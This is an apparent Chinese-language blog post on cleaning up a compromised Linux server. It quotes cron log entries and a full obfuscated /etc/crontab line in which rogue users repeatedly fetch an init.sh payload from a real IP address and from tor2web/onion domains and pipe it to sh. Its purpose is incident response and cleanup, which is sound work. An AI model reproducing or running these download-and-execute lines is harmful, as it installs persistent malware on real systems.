溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
現象:
安裝成功了
但是沒多久又進來了
而且至今登錄到系統來了 
[root@izd7oc0a0u64q75bim8bu8z ~]# tail /var/log/cron
\Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cur) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5724]: (root) CMD (echo 111 >> /home/test.txt)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5723]: (nobody) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5726]: (nginx) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5725]: (apache) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5718]: (nobody) MAIL (mailed 32 byte
[root@izd7oc0a0u64q75bim8bu8z tmp]# cat /etc/crontab
/13 root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://7xffbbbebumizpeg";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm2";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
每分鐘 nobody nginx apache用戶 執行一次 下載腳本運行
干掉這個腳本,然后停止了crond服務 在var/log/cronrizhikli日志里面就沒有異常下載腳本
還有這個異常
發現這里也有用戶
打開crontab就一直在下載一分鐘執行一次 
guoran果斷刪了 apache 和nobody 只剩下nginx一個在下載 但是 crontab -l也沒發現啥異常
做最后終于找到惡意用戶位置
直接全部刪掉只留下root 最后恢復正常了
以后要重點關注登錄系統用戶情況
more /var/log/secure |grep Accepted
查詢登錄頻繁用戶
awk '/Failed password/ {print $(NF-3)}' /var/log/secure |sort -n |uniq -c|sort -n |tail
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
